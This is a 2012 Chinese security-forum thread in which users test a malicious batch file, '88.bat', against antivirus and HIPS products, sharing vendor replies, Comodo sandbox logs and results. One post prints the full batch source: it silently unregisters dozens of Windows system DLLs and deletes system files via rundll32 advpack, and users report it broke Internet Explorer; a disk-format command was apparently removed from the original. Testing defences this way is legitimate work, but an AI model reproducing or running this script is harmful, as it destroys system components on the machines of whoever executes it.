转自：爱毒霸---批处理，测主防

显示全部楼层 · 发表于 2012-6-9 18:07:26

liwnpin 发表于 2012-6-9 14:45
过金山小A上报

测主防的，双击吧

显示全部楼层 · 发表于 2012-6-9 18:49:05

hddu 发表于 2012-6-9 15:23
360木马防火墙拦截的动作，可否改允许操作一次。

木有试啊

显示全部楼层 · 发表于 2012-6-9 19:05:11

XMonster 发表于 2012-6-9 18:49
木有试啊

行动啊，允许了，依然防止，360木马防火墙应该不错。

显示全部楼层 · 发表于 2012-6-9 19:17:24

hddu 发表于 2012-6-9 19:05
行动啊，允许了，依然防止，360木马防火墙应该不错。

手机 …… 没法用PC了第二步阻止所有拦截了注入regsvr32.exe等你可以看下自动阻止的项目

显示全部楼层 · 发表于 2012-6-9 20:36:02

AVG上报

显示全部楼层 · 发表于 2012-6-9 21:32:43

本帖最后由 humanlwj52 于 2012-6-11 10:56 编辑

Dear,

Thank you for your submission.
The detection for this threat will be included in our next signature update.

88.bat - BAT/Agent.NHZ trojan

Regards,

ESET Malware Response Team

Dear,

Thank you for your email to Avira's virus lab.
We received the following archive files:

Filename
Result
88.bat
CLEAN

The file '88.bat' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Kind regards
Avira Virus Lab

显示全部楼层 · 发表于 2012-6-9 21:59:05

过金山和EAV

显示全部楼层 · 发表于 2012-6-9 22:29:36

本帖最后由 a256886572008 于 2012-6-9 22:31 编辑

XMonster 发表于 2012-6-9 19:17
手机 …… 没法用PC了第二步阻止所有拦截了注入regsvr32.exe等你可以看下自动阻止的项目

父進程注入子進程，是正常行為，應該允許。

除非你的 HIPS 無法攔截那個子進程接下來的動作。

rem By Milo
@echo off

rem 全屏代码。。

echo exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul
chcp 437>nul
graftabl 936>nul
color 0a

rem 反向注册系统dll

regsvr32 /s /u *.dll

rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\System32\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\Catroot\icatalog.mdb
regsvr32 /s /u setupwbv.dll
regsvr32 /s /u wininet.dll
regsvr32 /s /u comcat.dll
regsvr32 /s /u shdoc401.dll
regsvr32 /s /u shdoc401.dll /i
regsvr32 /s /u asctrls.ocx
regsvr32 /s /u oleaut32.dll
regsvr32 /s /u shdocvw.dll /I
regsvr32 /s /u shdocvw.dll
regsvr32 /s /u browseui.dll
regsvr32 /s /u browseui.dll /I
regsvr32 /s /u msrating.dll
regsvr32 /s /u mlang.dll
regsvr32 /s /u hlink.dll
regsvr32 /s /u mshtml.dll
regsvr32 /s /u mshtmled.dll
regsvr32 /s /u urlmon.dll
regsvr32 /s /u plugin.ocx
regsvr32 /s /u sendmail.dll
regsvr32 /s /u comctl32.dll /i
regsvr32 /s /u inetcpl.cpl /i
regsvr32 /s /u mshtml.dll /i
regsvr32 /s /u scrobj.dll
regsvr32 /s /u mmefxe.ocx
regsvr32 /s /u proctexe.ocx mshta.exe /register
regsvr32 /s /u corpol.dll
regsvr32 /s /u jscript.dll
regsvr32 /s /u msxml.dll
regsvr32 /s /u imgutil.dll
regsvr32 /s /u thumbvw.dll
regsvr32 /s /u cryptext.dll
regsvr32 /s /u rsabase.dll
regsvr32 /s /u triedit.dll
regsvr32 /s /u dhtmled.ocx
regsvr32 /s /u inseng.dll
regsvr32 /s /u iesetup.dll /i
regsvr32 /s /u hmmapi.dll
regsvr32 /s /u cryptdlg.dll
regsvr32 /s /u actxprxy.dll
regsvr32 /s /u dispex.dll
regsvr32 /s /u occache.dll
regsvr32 /s /u occache.dll /i
regsvr32 /s /u iepeers.dll
regsvr32 /s /u wininet.dll /i
regsvr32 /s /u urlmon.dll /i
regsvr32 /s /u digest.dll /i
regsvr32 /s /u cdfview.dll
regsvr32 /s /u webcheck.dll
regsvr32 /s /u mobsync.dll
regsvr32 /s /u pngfilt.dll
regsvr32 /s /u licmgr10.dll
regsvr32 /s /u icmfilter.dll
regsvr32 /s /u hhctrl.ocx
regsvr32 /s /u inetcfg.dll
regsvr32 /s /u trialoc.dll
regsvr32 /s /u tdc.ocx
regsvr32 /s /u MSR2C.DLL
regsvr32 /s /u msident.dll
regsvr32 /s /u msieftp.dll
regsvr32 /s /u xmsconf.ocx
regsvr32 /s /u ils.dll
regsvr32 /s /u msoeacct.dll
regsvr32 /s /u wab32.dll
regsvr32 /s /u wabimp.dll
regsvr32 /s /u wabfind.dll
regsvr32 /s /u oemiglib.dll
regsvr32 /s /u directdb.dll
regsvr32 /s /u inetcomm.dll
regsvr32 /s /u msoe.dll
regsvr32 /s /u oeimport.dll
regsvr32 /s /u msdxm.ocx
regsvr32 /s /u dxmasf.dll
regsvr32 /s /u laprxy.dll
regsvr32 /s /u l3codecx.ax
regsvr32 /s /u acelpdec.ax
regsvr32 /s /u mpg4ds32.ax
regsvr32 /s /u voxmsdec.ax
regsvr32 /s /u danim.dll
regsvr32 /s /u Daxctle.ocx
regsvr32 /s /u lmrt.dll
regsvr32 /s /u datime.dll
regsvr32 /s /u dxtrans.dll
regsvr32 /s /u dxtmsft.dll
regsvr32 /s /u vgx.dll
regsvr32 /s /u WEBPOST.DLL
regsvr32 /s /u WPWIZDLL.DLL
regsvr32 /s /u POSTWPP.DLL
regsvr32 /s /u CRSWPP.DLL
regsvr32 /s /u FTPWPP.DLL
regsvr32 /s /u FPWPP.DLL
regsvr32 /s /u FLUPL.OCX
regsvr32 /s /u wshom.ocx
regsvr32 /s /u wshext.dll
regsvr32 /s /u vbscript.dll
regsvr32 /s /u wupdinfo.dll
regsvr32 /s /u shimgvw.dll
regsvr32 /s /u wmpdxm.dll
regsvr32 /s /u appwiz.cpl
regsvr32 /s /u msi.dll
regsvr32 /s /u /i shell32.dll
regsvr32 /s /u scrrun.dll mstinit.exe /setup
regsvr32 /s /u msnsspc.dll /SspcCreateSspiReg
regsvr32 /s /u msapsspc.dll /SspcCreateSspiReg

显示全部楼层 · 发表于 2012-6-9 22:45:46

2012-06-09 22:33:41       C:\Documents and Settings\Roger\桌面\virus\88\88.bat       Sandboxed As       Partially Limited
2012-06-09 22:33:42       C:\WINDOWS\system32\conime.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:42       C:\WINDOWS\system32\cmd.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:43       C:\WINDOWS\system32\cmd.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:43       C:\WINDOWS\system32\debug.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:47       C:\WINDOWS\system32\chcp.com       Sandboxed As       Partially Limited
2012-06-09 22:33:48       C:\WINDOWS\system32\graftabl.com       Sandboxed As       Partially Limited
2012-06-09 22:33:49       C:\WINDOWS\system32\regsvr32.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:49       C:\WINDOWS\system32\advpack.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:50       C:\WINDOWS\system32\advpack.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:50       C:\WINDOWS\system32\regsvr32.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:51       C:\WINDOWS\system32\wininet.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:52       C:\WINDOWS\system32\comcat.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:52       C:\WINDOWS\system32\regsvr32.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:52       C:\WINDOWS\system32\regsvr32.exe       Sandboxed As       Partially Limited
2012-06-09 22:33:52       C:\WINDOWS\system32\asctrls.ocx       Sandboxed As       Partially Limited
2012-06-09 22:33:53       C:\WINDOWS\system32\oleaut32.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:54       C:\WINDOWS\system32\shdocvw.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:55       C:\WINDOWS\system32\shdocvw.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:55       C:\WINDOWS\system32\browseui.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:56       C:\WINDOWS\system32\browseui.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:56       C:\WINDOWS\system32\msrating.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:57       C:\WINDOWS\system32\mlang.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:57       C:\WINDOWS\system32\hlink.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:58       C:\WINDOWS\system32\mshtml.dll       Sandboxed As       Partially Limited
2012-06-09 22:33:59       C:\WINDOWS\system32\mshtmled.dll       Sandboxed As       Partially Limited
2012-06-09 22:34:00       C:\WINDOWS\system32\urlmon.dll       Sandboxed As       Partially Limited
2012-06-09 22:34:00       C:\WINDOWS\system32\regsvr32.exe       Sandboxed As       Partially Limited
2012-06-09 22:34:00       C:\WINDOWS\system32\sendmail.dll       Sandboxed As       Partially Limited
2012-06-09 22:34:01       C:\WINDOWS\system32\comctl32.dll       Sandboxed As       Partially Limited
2012-06-09 22:34:01       C:\WINDOWS\system32\inetcpl.cpl       Sandboxed As       Partially Limited
2012-06-09 22:34:03       C:\WINDOWS\system32\mshtml.dll       Sandboxed As       Partially Limited
2012-06-09 22:34:04       C:\WINDOWS\system32\scrobj.dll       Sandboxed As       Partially Limited

2012-06-09 22:34:09       C:\WINDOWS\system32\asctrls.ocx       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{6E449683-C509-11CF-AAFA-00AA00B6015C}\Control
2012-06-09 22:34:09       C:\WINDOWS\system32\shdocvw.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{0E5CBF21-D15F-11d0-8301-00AA005B4383}\Implemented Categories\{00021492-0000-0000-C000-000000000046}
2012-06-09 22:34:09       C:\WINDOWS\system32\browseui.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{30D02401-6A81-11d0-8274-00C04FD5AE38}\Implemented Categories\{00021493-0000-0000-C000-000000000046}
2012-06-09 22:34:09       C:\WINDOWS\system32\mlang.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\InProcServer32
2012-06-09 22:34:09       C:\WINDOWS\system32\hlink.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{79eac9d1-baf9-11ce-8c82-00aa004ba90b}\InprocServer32
2012-06-09 22:34:09       C:\WINDOWS\system32\mshtmled.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{3050f4e1-98b5-11cf-bb82-00aa00bdce0b}\ProgID
2012-06-09 22:34:09       C:\WINDOWS\system32\urlmon.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{c733e4af-576e-11d0-b28c-00c04fd7cd22}\InprocServer32
2012-06-09 22:34:09       C:\WINDOWS\system32\sendmail.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}\shellex\DropHandler
2012-06-09 22:34:09       C:\WINDOWS\system32\sendmail.dll       Modify File       C:\Documents and Settings\Roger\SendTo\郵件收件者.MAPIMail
2012-06-09 22:34:09       C:\WINDOWS\system32\sendmail.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{9E56BE61-C50F-11CF-9A2C-00A0C90A90CE}\shellex\DropHandler
2012-06-09 22:34:09       C:\WINDOWS\system32\sendmail.dll       Modify File       C:\Documents and Settings\Roger\SendTo\桌面當作捷徑.DeskLink
2012-06-09 22:34:09       C:\WINDOWS\system32\scrobj.dll       Modify Key       HKLM\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

1.反註冊：comodo 默認 RD 規則，阻止訪問 CLSID 下面所有東西。

不過，測完重啟之後，我的 IE 無法正常使用，不知道是動到什麼地方了？

2.我刻意設個全局FD規則，看看他會動什麼文件，結果反註冊會把部份相關的文件給刪除。

如上圖日誌標示的，這個comodo 默認 FD 規則就沒攔截了。

显示全部楼层 · 发表于 2012-6-9 23:02:35

本帖最后由 XMonster 于 2012-6-9 23:05 编辑

a256886572008 发表于 2012-6-9 22:45
1.反註冊：comodo 默認 RD 規則，阻止訪問 CLSID 下面所有東西。

不過，測完重啟之後，我的 IE 無法 ...

1.更恶心的是原样本还带有格式化全盘的命令，我手动删除了
2.IE无法打开，貌似是反注册IE导致

[病毒样本] 转自：爱毒霸---批处理，测主防